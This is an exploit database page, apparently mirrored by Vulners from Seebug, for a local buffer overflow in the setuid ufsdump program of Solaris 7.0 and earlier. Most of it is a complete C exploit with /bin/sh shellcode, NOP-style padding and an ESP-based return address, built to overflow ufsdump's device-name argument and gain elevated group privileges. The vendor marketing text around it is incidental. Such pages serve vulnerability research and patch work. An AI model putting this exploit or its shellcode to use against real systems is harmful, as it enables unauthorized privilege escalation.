Lucene search
K

Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (1)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

Buffer overflow in Solaris ufsdump program allows local users to gain root and tty group acces

Code

                                                source: http://www.securityfocus.com/bid/680/info


A buffer overflow vulnerability in the /usr/lib/fs/ufs/ufsdump setuid program allows local users to obtain root and tty group access. The vulnerability is the result of &#39;ufsdump&#39; not being able to handle device names of a large length.


/* ufsdump.c
* Description:  Overflows a buffer to give you EGID=tty.
* At least that&#39;s what id reports.
* The running shell thinks its still the user.  Maybe I&#39;m
* doing something wrong?  At any
* rate,  here ya go, have fun.
*
*  [email protected]
*  Thanks to: Jesse Schachter for the box, and
*  Unknown parties for the shellcode. (probably Aleph1).
*/

#include &#60;stdio.h&#62;
static inline getesp() {
  __asm__(&#34; movl %esp,%eax &#34;);
}
main(int argc, char **argv) {
  int i,j,buffer,offset;
  long unsigned esp;
  char unsigned buf[4096];
  unsigned char
  shellcode[]=
      &#34;\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3&#34;
        &#34;\x33\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05&#34;
        &#34;\x07\x88\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff&#34;
        &#34;\xff\x0f\x0f\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46&#34;
        &#34;\x0c\x50\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff&#34;
        &#34;\x83\xc4\x0c\x6a\x01\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4&#34;
        &#34;\xff\xff\xff/bin/sh&#34;;
  buffer=895;
  offset=3500;
  if (argc&#62;1)buffer=atoi(argv[1]);
  if (argc&#62;2)offset=atoi(argv[2]);
  for (i=0;i&#60;buffer;i++)
     buf[i]=0x41;  /* inc ecx */
  j=0;
  for (i=buffer;i&#60;buffer+strlen(shellcode);i++)
      buf[i]=shellcode[j++];
  esp=getesp()+offset;
  buf[i]=esp & 0xFF;
  buf[i+1]=(esp &#62;&#62; 8) & 0xFF;
  buf[i+2]=(esp &#62;&#62; 16) & 0xFF;
  buf[i+3]=(esp &#62;&#62; 24) & 0xFF;
  buf[i+4]=esp & 0xFF;
  buf[i+5]=(esp &#62;&#62; 8) & 0xFF;
  buf[i+6]=(esp &#62;&#62; 16) & 0xFF;
  buf[i+7]=(esp &#62;&#62; 24) & 0xFF;
  printf(&#34;Offset: 0x%x\n\n&#34;,esp);
  execl(&#34;/usr/lib/fs/ufs/ufsdump&#34;,&#34;ufsdump&#34;,&#34;1&#34;,buf,NULL);
}



                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
25